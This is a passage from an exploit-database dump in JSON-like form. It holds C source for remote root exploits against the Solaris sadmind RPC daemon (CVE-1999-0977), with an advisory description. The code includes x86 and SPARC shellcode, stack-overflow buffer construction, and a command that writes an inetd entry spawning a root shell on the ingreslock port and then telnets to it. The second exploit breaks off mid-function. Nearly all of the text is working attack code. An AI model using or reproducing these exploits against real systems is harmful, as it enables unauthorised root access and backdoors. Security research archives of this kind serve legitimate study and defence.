\"\\x47\\xff\\x89\\x7e\\x08\\x01\\xdf\\x88\\x47\\xff\\x89\\x46\"\r\n \"\\x0c\\xb0\\x3b\\xe8\\xbe\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\"\r\n \"\\xbe\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n 
\"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n \"\\x2f\\x73\\x68\\xff\\x2d\\x63\\xff\";\r\n \r\n\r\nint buflen[] = { 1076, 1056 };\r\nint addrlen[] = { 560, 8 };\r\nint lens[] = { 84, 76 };\r\nint offset[] = { 688, 572 };\r\nint alignment[] = { 4, 0 };\r\nlong int nops[] = { 0x801bc00f, 0x90 };\r\nint junks[] = { 512, 536 };\r\nchar command[] = \"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \"\r\n \t \"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;\";\r\n\r\nunsigned long int sp[] = { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };\r\n \r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define FW_VERSION \"VERSION\"\r\n#define CLIENT_DOMAIN \"CLIENT_DOMAIN\"\r\n#define FENCE \"FENCE\"\r\n\r\nstruct nm_send_header {\r\n struct timeval timeval1;\r\n struct timeval timeval2;\r\n struct timeval timeval3;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n unsigned int uint5;\r\n struct in_addr inaddr1;\r\n struct in_addr inaddr2;\r\n unsigned long ulong1;\r\n unsigned long ulong2;\r\n struct in_addr inaddr3;\r\n unsigned long ulong3;\r\n unsigned long ulong4;\r\n unsigned long ulong5;\r\n struct timeval timeval4;\r\n unsigned int uint6;\r\n struct timeval timeval5;\r\n char *string1;\r\n char *string2;\r\n char *string3;\r\n unsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n int int1;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct 
nm_send_arg_string {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n char *string1;\r\n};\r\n\r\nstruct nm_send {\r\n struct nm_send_header header;\r\n struct nm_send_arg_int version;\r\n struct nm_send_arg_string string;\r\n struct nm_send_arg_int fence;\r\n struct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string1;\r\n};\r\n\r\nbool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n char *addr;\r\n size_t size = sizeof(struct in_addr);\r\n\r\n if(!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint5))\r\n return (FALSE);\r\n addr = (char *) &objp->inaddr1.s_addr;\r\n if(!xdr_bytes(xdrs, &addr, &size, size))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong1))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong2))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong3))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong4))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong5))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint6))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, 
&objp->timeval5.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint7))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_int(xdrs, &objp->int1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string2))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n if(!xdr_nm_send_header(xdrs, &objp->header))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n return (FALSE);\r\n if(!xdr_nm_send_footer(xdrs, &objp->footer))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_reply(XDR *xdrs, struct nm_reply 
*objp)\r\n{\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nvoid usage(char *prog)\r\n{\r\n fprintf(stderr, \"usage: %s -t target -a arch [-s size]\", prog);\r\n fprintf(stderr, \" [-i increment] [-p]\\n\");\r\n fprintf(stderr, \"\\tarchitectures:\\n\");\r\n fprintf(stderr, \"\\t0 - Solaris SPARC 2.6\\n\");\r\n fprintf(stderr, \"\\t1 - Solaris SPARC 2.7 (7.0)\\n\");\r\n fprintf(stderr, \"\\t2 - Solaris x86 2.6\\n\");\r\n fprintf(stderr, \"\\t3 - Solaris x86 2.7 (7.0)\\n\\n\");\r\n\r\n exit(-1); \r\n}\r\n\r\nint exp(char *host, int arch, unsigned long int sp, int pinging)\r\n{\r\n CLIENT *cl;\r\n struct nm_send send;\r\n struct nm_reply reply;\r\n struct timeval tm;\r\n enum clnt_stat stat;\r\n int c, i, len, slen, clen, junk, a;\r\n char *cp, *buf;\r\n unsigned long int addr, fp;\r\n \r\n a = (int) arch / 2; \r\n buf = (char *) malloc(buflen[a] + 1);\r\n\r\n if(a)\r\n {\r\n /* Solaris x86 */\r\n memset(buf, nops[a], buflen[a]);\r\n junk = junks[arch - 2];\r\n junk &= 0xfffffffc;\r\n\r\n for (i = 0, cp = buf + alignment[a]; i < junk / 4; i++) \r\n {\r\n *cp++ = (sp >> 0) & 0xff;\r\n *cp++ = (sp >> 8) & 0xff;\r\n *cp++ = (sp >> 16) & 0xff;\r\n *cp++ = (sp >> 24) & 0xff;\r\n }\r\n\r\n addr = sp + offset[a];\r\n\r\n for (i = 0; i < addrlen[a] / 4; i++) \r\n {\r\n *cp++ = (addr >> 0) & 0xff;\r\n *cp++ = (addr >> 8) & 0xff;\r\n *cp++ = (addr >> 16) & 0xff;\r\n *cp++ = (addr >> 24) & 0xff;\r\n }\r\n\r\n slen = strlen(shellx86); \r\n clen = strlen(command);\r\n len = clen; \r\n len++; \r\n len = -len;\r\n shellx86[lens[a]+0] = (len >> 0) & 0xff;\r\n shellx86[lens[a]+1] = (len >> 8) & 0xff;\r\n shellx86[lens[a]+2] = (len >> 16) & 0xff;\r\n shellx86[lens[a]+3] = (len >> 24) & 0xff;\r\n cp = buf + buflen[a] - 1 - clen - slen;\r\n memcpy(cp, shellx86, slen); \r\n cp += slen;\r\n memcpy(cp, command, clen); \r\n cp 
+= clen;\r\n *cp = '\\xff';\r\n }\r\n else\r\n {\r\n /* Solaris SPARC */\r\n memset(buf, '\\xff', buflen[a]);\r\n fp = sp + FRAMELEN1 + FRAMELEN2;\r\n fp &= 0xfffffff8;\r\n addr = sp + offset[a];\r\n addr &= 0xfffffffc;\r\n\r\n for(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)\r\n {\r\n *cp++ = (fp >> 24) & 0xff;\r\n *cp++ = (fp >> 16) & 0xff;\r\n *cp++ = (fp >> 8) & 0xff;\r\n *cp++ = (fp >> 0) & 0xff;\r\n *cp++ = (addr >> 24) & 0xff;\r\n *cp++ = (addr >> 16) & 0xff;\r\n *cp++ = (addr >> 8) & 0xff;\r\n *cp++ = (addr >> 0) & 0xff;\r\n }\r\n \r\n slen = strlen(shellsparc);\r\n clen = strlen(command);\r\n len = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];\r\n len &= 0xfffffffc;\r\n for(i = 0; i < lens[a] / 4; i++)\r\n {\r\n *cp++ = (nops[a] >> 24) & 0xff;\r\n *cp++ = (nops[a] >> 16) & 0xff;\r\n *cp++ = (nops[a] >> 8) & 0xff;\r\n *cp++ = (nops[a] >> 0) & 0xff;\r\n }\r\n len = clen;\r\n len++;\r\n len = -len;\r\n shellsparc[lens[a]+0] = (len >> 24) & 0xff;\r\n shellsparc[lens[a]+1] = (len >> 16) & 0xff;\r\n shellsparc[lens[a]+2] = (len >> 8) & 0xff;\r\n shellsparc[lens[a]+3] = (len >> 0) & 0xff;\r\n memcpy(cp, shellsparc, slen);\r\n cp += slen;\r\n memcpy(cp, command, clen);\r\n }\r\n\r\n buf[buflen[a]] = '\\0';\r\n memset(&send, 0, sizeof(struct nm_send));\r\n send.header.uint2 = NETMGT_HEADER_TYPE;\r\n send.header.string1 = \"\";\r\n send.header.string2 = \"\";\r\n send.header.string3 = \"\";\r\n send.header.uint7 =\r\n strlen(FW_VERSION) + 1 +\r\n (4 * sizeof(unsigned int)) + sizeof(int) +\r\n strlen(CLIENT_DOMAIN) + 1 +\r\n (4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n strlen(FENCE) + 1 +\r\n (4 * sizeof(unsigned int)) + sizeof(int) +\r\n strlen(NETMGT_ENDOFARGS) + 1;\r\n send.version.string1 = FW_VERSION;\r\n send.version.uint1 = NETMGT_ARG_INT;\r\n send.version.uint2 = sizeof(int);\r\n send.version.int1 = 1;\r\n send.string.string1 = CLIENT_DOMAIN;\r\n send.string.uint1 = NETMGT_ARG_STRING;\r\n send.string.uint2 = strlen(buf);\r\n 
send.string.string2 = buf;\r\n send.fence.string1 = FENCE;\r\n send.fence.uint1 = NETMGT_ARG_INT;\r\n send.fence.uint2 = sizeof(int);\r\n send.fence.int1 = 666;\r\n send.footer.string1 = NETMGT_ENDOFARGS;\r\n cl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n\r\n if (cl == NULL) \r\n {\r\n clnt_pcreateerror(\"clnt_create\");\r\n return 0;\r\n }\r\n\r\n cl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n\r\n if (!pinging) \r\n {\r\n tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n stat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n xdr_nm_send, (caddr_t) &send,\r\n xdr_nm_reply, (caddr_t) &reply, tm);\r\n\r\n if (stat != RPC_SUCCESS) \r\n {\r\n clnt_perror(cl, \"clnt_call\");\r\n fprintf(stdout, \"now check if exploit worked;\\n\");\r\n return 0;\r\n }\r\n\r\n fprintf(stderr, \"exploit failed; \"\r\n \"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n reply.uint1, reply.uint2, reply.string1);\r\n clnt_destroy(cl);\r\n exit(1);\r\n } \r\n else \r\n {\r\n\r\n tm.tv_sec = NETMGT_UDP_PING_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n stat = clnt_call(cl, NETMGT_PROC_PING,\r\n xdr_void, NULL,\r\n xdr_void, NULL, tm);\r\n\r\n if (stat != RPC_SUCCESS) \r\n {\r\n clnt_perror(cl, \"clnt_call\");\r\n exit(1);\r\n }\r\n\r\n 
clnt_destroy(cl);\r\n return 0;\r\n }\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int i, arch;\r\n char *host = \"\";\r\n int pinging = 0, inc = 4, size = 2048;\r\n unsigned long int addr;\r\n\r\n for(i=0;i<argc;i++)\r\n {\r\n if(!strcmp(argv[i], \"-t\"))\r\n host = argv[i+1]; \r\n if(!strcmp(argv[i], \"-a\"))\r\n arch = atoi(argv[i+1]);\r\n if(!strcmp(argv[i], \"-i\"))\r\n inc = atoi(argv[i+1]);\r\n if(!strcmp(argv[i], \"-s\"))\r\n size = atoi(argv[i+1]); \r\n if(!strcmp(argv[i], \"-p\"))\r\n pinging = 1;\r\n }\r\n\r\n if(arch > 3 || arch < 0)\r\n usage(argv[0]);\r\n if(size < 0)\r\n usage(argv[0]);\r\n if(inc < 0)\r\n usage(argv[0]);\r\n\r\n for(i = 0; i < size; i+=inc)\r\n {\r\n addr = sp[arch] + i;\r\n exp(host, arch, addr, pinging); \r\n addr = sp[arch] - i;\r\n exp(host, arch, addr, pinging);\r\n }\r\n\r\n execl(\"telnet\", host, \"ingreslock\");\r\n return 0;\r\n}\r\n\n\n// milw0rm.com [2000-12-01]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/213/"}, {"lastseen": "2016-02-02T12:24:35", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1). CVE-1999-0977. Remote exploit for solaris platform", "published": "1999-06-24T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "1999-06-24T00:00:00", "id": "EDB-ID:19668", "href": "https://www.exploit-db.com/exploits/19668/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n\r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. 
The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n\r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in question appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root, any code launched as a result will run with root privileges, therefore resulting in a root compromise. \r\n\r\n/**\r\n*** sadmindex - SPARC Solaris remote root exploit for /usr/sbin/sadmind\r\n***\r\n*** Tested and confirmed under Solaris 2.6 and 7.0 (SPARC)\r\n***\r\n*** Usage: % sadmindex -h hostname -c command -s sp [-o offset] \\\r\n*** [-a alignment] [-p]\r\n***\r\n*** where hostname is the hostname of the machine running the vulnerable\r\n*** system administration daemon, command is the command to run as root\r\n*** on the vulnerable machine, sp is the %sp stack pointer value, offset\r\n*** is the number of bytes to add to sp to calculate the desired return\r\n*** address, and alignment is the number of bytes needed to correctly\r\n*** align the contents of the exploit buffer.\r\n***\r\n*** If run with a -p option, the exploit will only \"ping\" sadmind on the\r\n*** remote machine to start it running. The daemon will be otherwise\r\n*** untouched. Since pinging the daemon does not require an exploit\r\n*** buffer to be constructed, you can safely omit the -c and -s options\r\n*** if you use -p.\r\n***\r\n*** When specifying a command, be sure to pass it to the exploit as a\r\n*** single argument, namely enclose the command string in quotes if it\r\n*** contains spaces or other special shell delimiter characters. 
The\r\n*** exploit will pass this string without modification to /bin/sh -c on\r\n*** the remote machine, so any normally allowed Bourne shell syntax is\r\n*** also allowed in the command string. The command string and the\r\n*** assembly code to run it must fit inside a buffer of 512 bytes, so\r\n*** the command string has a maximum length of about 380 bytes or so.\r\n***\r\n*** Due to the nature of the target overflow in sadmind, the exploit is\r\n*** extremely sensitive to the %sp stack pointer value that is provided\r\n*** when the exploit is run. The %sp stack pointer must be specified\r\n*** with the exact required value, leaving no room for error. I have\r\n*** provided confirmed values for Solaris running on a Sun SPARCengine\r\n*** Ultra AXi machine running Solaris 2.6 5/98 and on a SPARCstation 1\r\n*** running Solaris 7.0 10/98. On each system, sadmind was started from\r\n*** an instance of inetd that was started at boot time by init. There\r\n*** is a strong possibility that the demonstration values will not work\r\n*** due to differing sets of environment variables, for example if the\r\n*** running inetd on the remote machine was started manually from an\r\n*** interactive shell. If you find that the sample value for %sp does\r\n*** not work, try adjusting the value by -2048 to 2048 from the sample in\r\n*** increments of 8 for starters. The offset parameter and the alignment\r\n*** parameter have default values that will be used if no overriding\r\n*** values are specified on the command line. 
The default values should\r\n*** be suitable and it will not likely be necessary to override them.\r\n***\r\n*** Demonstration values for SPARC Solaris:\r\n***\r\n*** (2.6) sadmindex -h host.example.com -c \"touch HEH\" -s 0xefff9580\r\n*** (7.0) sadmindex -h host.example.com -c \"touch HEH\" -s 0xefff9418\r\n***\r\n*** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n***\r\n*** Cheez Whiz\r\n*** cheezbeast@hotmail.com\r\n***\r\n*** June 24, 1999\r\n**/\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define ADM_FW_VERSION \"ADM_FW_VERSION\"\r\n#define ADM_CLIENT_DOMAIN \"ADM_CLIENT_DOMAIN\"\r\n#define ADM_FENCE \"ADM_FENCE\"\r\n\r\n#define BUFLEN 1076\t\t/* 256+256+32+32+512-12 */\r\n#define ADDRLEN 560\t\t/* 256+256+32+32-4-12 */\r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n#define LEN 84\r\n\r\n#define OFFSET 688\t\t/* default offset */\r\n#define ALIGNMENT 4\t\t/* default alignment */\r\n\r\n#define NOP 0x801bc00f\t\t/* xor %o7,%o7,%g0 */\r\n\r\nchar shell[] =\r\n/* 0 */ \"\\x20\\xbf\\xff\\xff\" /* bn,a ? */\r\n/* skip: */\r\n/* 4 */ \"\\x20\\xbf\\xff\\xff\" /* bn,a ? 
*/\r\n/* 8 */ \"\\x7f\\xff\\xff\\xff\" /* call skip */\r\n/* execve: */\r\n/* 12 */ \"\\x90\\x03\\xe0\\x5c\" /* add %o7,92,%o0 */\r\n/* 16 */ \"\\x92\\x22\\x20\\x10\" /* sub %o0,16,%o1 */\r\n/* 20 */ \"\\x94\\x1b\\xc0\\x0f\" /* xor %o7,%o7,%o2 */\r\n/* 24 */ \"\\xec\\x02\\x3f\\xf0\" /* ld [%o0-16],%l6 */\r\n/* 28 */ \"\\xac\\x22\\x80\\x16\" /* sub %o2,%l6,%l6 */\r\n/* 32 */ \"\\xae\\x02\\x60\\x10\" /* add %o1,16,%l7 */\r\n/* 36 */ \"\\xee\\x22\\x3f\\xf0\" /* st %l7,[%o0-16] */\r\n/* 40 */ \"\\xae\\x05\\xe0\\x08\" /* add %l7,8,%l7 */\r\n/* 44 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 48 */ \"\\xee\\x22\\x3f\\xf4\" /* st %l7,[%o0-12] */\r\n/* 52 */ \"\\xae\\x05\\xe0\\x03\" /* add %l7,3,%l7 */\r\n/* 56 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 60 */ \"\\xee\\x22\\x3f\\xf8\" /* st %l7,[%o0-8] */\r\n/* 64 */ \"\\xae\\x05\\xc0\\x16\" /* add %l7,%l6,%l7 */\r\n/* 68 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 72 */ \"\\xc0\\x22\\x3f\\xfc\" /* st %g0,[%o0-4] */\r\n/* 76 */ \"\\x82\\x10\\x20\\x3b\" /* mov 59,%g1 */\r\n/* 80 */ \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n/* data: */\r\n/* 84 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 88 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 92 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 96 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 100 */ \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\" /* DATA */\r\n/* 108 */ \"\\x2d\\x63\\xff\"; /* DATA */\r\n\r\nextern char *optarg;\r\n\r\nstruct nm_send_header {\r\n struct timeval timeval1;\r\n struct timeval timeval2;\r\n struct timeval timeval3;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n unsigned int uint5;\r\n struct in_addr inaddr1;\r\n struct in_addr inaddr2;\r\n unsigned long ulong1;\r\n unsigned long ulong2;\r\n struct in_addr inaddr3;\r\n unsigned long ulong3;\r\n unsigned long ulong4;\r\n unsigned long ulong5;\r\n struct timeval timeval4;\r\n unsigned int uint6;\r\n struct timeval timeval5;\r\n 
char *string1;\r\n char *string2;\r\n char *string3;\r\n unsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n int int1;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n char *string1;\r\n};\r\n\r\nstruct nm_send {\r\n struct nm_send_header header;\r\n struct nm_send_arg_int version;\r\n struct nm_send_arg_string string;\r\n struct nm_send_arg_int fence;\r\n struct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string1;\r\n};\r\n\r\nbool_t\r\nxdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n char *addr;\r\n size_t size = sizeof(struct in_addr);\r\n\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint5))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr1.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr2.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong1))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong2))\r\n\treturn 
(FALSE);\r\n addr = (char *) &objp->inaddr3.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong3))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong4))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong5))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint6))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint7))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_int(xdrs, &objp->int1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_string(XDR 